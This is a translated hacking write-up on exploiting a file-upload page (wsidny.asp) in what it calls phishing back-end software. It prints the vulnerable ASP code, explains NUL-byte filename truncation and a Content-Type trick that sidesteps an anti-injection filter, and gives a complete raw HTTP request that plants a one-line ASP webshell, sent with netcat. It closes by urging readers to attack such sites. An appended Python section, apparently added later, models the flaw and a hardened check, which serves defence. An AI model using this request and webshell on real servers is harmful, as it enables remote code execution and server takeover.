By: rubbish

Fingerprint: the copyright notice is visible on login.asp, although some "boxes" (phishing back-ends) have changed that path. There is also a wsidny.asp in the main directory. The whole program filters input very strictly; you can tell it was written by a professional security person. The only exploitable spot is this wsidny.asp. Look at the code:

<!-- #include file="conn.asp"-->
<%
Server.ScriptTimeout = 36000
PostSize = Request.TotalBytes
if postsize=0 then
    response.End()
end if
BytesRead = 0
ReadSize=256
HeadSize=256
' the first 256 bytes of the raw body are taken as the file name,
' everything after them as the file content
filename = Request.BinaryRead(ReadSize)
BytesRead = BytesRead + ReadSize
PostData = Request.BinaryRead(PostSize - BytesRead)
StoreFile(filename)

' convert the raw bytes of the name into a gb2312 string
Function Bytes2bStr(vin)
    if lenb(vin) =0 then
        Bytes2bStr = ""
        exit function
    end if
    Dim BytesStream,StringReturn
    set BytesStream = Server.CreateObject("ADODB.Stream")
    BytesStream.Type = 2
    BytesStream.Open
    BytesStream.WriteText vin
    BytesStream.Position = 0
    BytesStream.Charset = "gb2312"
    BytesStream.Position = 2
    StringReturn = BytesStream.ReadText
    BytesStream.close
    set BytesStream = Nothing
    Bytes2bStr = StringReturn
End Function

Function StoreFile(filename)
    filea=Bytes2bStr(filename)
    filea=LCase(filea)
    ' extension check: substring match of the last dot-separated piece
    ' against the allow-list, applied to the full 256-character name
    if instr(filea,".")>0 then
        fileb=split(filea,".")
        num2=ubound(fileb)
        if instr("jpg|gif|jpeg|png|bmp",fileb(num2))>0 then
            filea=filea
        else
            filea=filea&".gif"
        end if
    else
        filea=filea&".gif"
    end if
    ' the path is only resolved (and truncated) after the check above
    Path=server.MapPath(imgFolder&filea)
    Set oFileStream = CreateObject ("ADODB.Stream")
    oFileStream.Type = 1
    oFileStream.Mode = 3
    oFileStream.Open
    oFileStream.Write(PostData)
    oFileStream.SaveToFile Path,2
    oFileStream.Close
    Set oFileStream = Nothing
End Function
Response.Write PostSize
Response.Write " bytes were read."
%>

I never figured out what this page is for; maybe it generates images for cracking the account security protection. At first I wanted to build a form locally and submit it directly, uploading an image shell with a ; in the name, but because the data is read with Request.BinaryRead, URL-encoded parameters can't be retrieved at all. So I switched to sending the packet with VBS.

Another problem here: the path is taken from the first 256 characters, which exceeds the maximum length that server.MapPath supports later on, so I thought of truncating it with \00. I captured the HTTP request sent by the VBS, wrote the truncation in UE (UltraEdit), then submitted it; with the include file removed the test succeeded. But with the include present it still threw an error, because conn.asp includes an anti-injection page, fsql.asp, that checks Request.Form, and once Request.Form has been called you can no longer call Request.BinaryRead or you get an error. So what is the point of this page?

I was stuck on this for a long time, then tried removing the Content-Type: application/x-www-form-urlencoded header from the HTTP request, submitted it, and found that the upload actually succeeded; only then did I realise I had been being stupid all along. With that header removed, IIS assumes no parameters were submitted in form format, so Request.Form receives no data and no longer conflicts with the later Request.BinaryRead.

Here is the exploitation method:

POST /DNFZONX/wsidny.asp HTTP/1.1
Accept-Language: zh-cn
Content-Length: 284
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.fuck.com
Connection: Keep-Alive

a.asp aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<%execute request("value")%>

The part before the one-line shell code has to be padded to 256 characters; then in UE replace the space with \00, change the Host header and so on, and submit it with NC (netcat). If the response says xxx bytes were read. it worked, and the file is img/a.asp under the target folder. If the image directory can't be found or isn't executable, just use ../ or similar to break out of it, as long as there are exactly 256 characters before the one-line shell. Tested successfully locally; when you run into boxes and envelopes, go hard at them!
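Added here as an illustration, not code from the post: a Python model of the StoreFile extension check beside a hardened one, showing why checking the raw 256-byte name and only afterwards letting Server.MapPath resolve (and truncate) it fails, and what a check on the exact string to be stored looks like. The NUL-truncation behaviour of MapPath is assumed from the post's description; `outcome` and `PAYLOAD` are constructed for the demo.

```python
from typing import Optional

ALLOWED = {"jpg", "gif", "jpeg", "png", "bmp"}
NAME_BYTES = 256  # wsidny.asp takes the first 256 bytes of the body as the name

def name_from_body(body: bytes) -> str:
    """Model of Request.BinaryRead(256) followed by Bytes2bStr (gb2312)."""
    return body[:NAME_BYTES].decode("gb2312", errors="replace")

def original_check(raw_name: str) -> str:
    """Model of StoreFile: lower-case, split on '.', substring-match the last
    piece against the allow-list, otherwise append '.gif'."""
    filea = raw_name.lower()
    if "." in filea:
        last = filea.split(".")[-1]
        # VBScript InStr() is a substring test: '' and 'g' both pass here
        if last in "jpg|gif|jpeg|png|bmp":
            return filea
    return filea + ".gif"

def map_path(img_folder: str, name: str) -> str:
    """Assumption taken from the post: the NUL-terminated path APIs behind
    Server.MapPath stop at the first NUL, so the rest of the name is dropped."""
    return img_folder + name.split("\x00", 1)[0]

def hardened_check(raw_name: str) -> Optional[str]:
    """Validate the exact string that will be stored: no control bytes, no
    separators or dot-dot, and an exact (not substring) allow-listed extension."""
    name = raw_name.lower().strip()
    if any(ord(c) < 0x20 for c in name) or "/" in name or "\\" in name:
        return None
    base, dot, ext = name.rpartition(".")
    if not dot or not base or ".." in name or ext not in ALLOWED:
        return None
    return name

def outcome(body: bytes, img_folder: str = "img/") -> dict:
    """Where each check would store one request body."""
    raw_name = name_from_body(body)
    safe = hardened_check(raw_name)
    return {
        "original_stored": map_path(img_folder, original_check(raw_name)),
        "hardened_stored": None if safe is None else img_folder + safe,
    }

# Constructed body in the shape the post describes: 'a.asp', a NUL, padding
# to exactly 256 bytes, then whatever follows becomes the file content.
PAYLOAD = b"a.asp\x00" + b"a" * (NAME_BYTES - 6) + b"(file content)"
```

The original check passes the padded name (the allow-list test fails and ".gif" is appended) but the stored path still ends at "a.asp"; the hardened check rejects it outright because the NUL never reaches the file system.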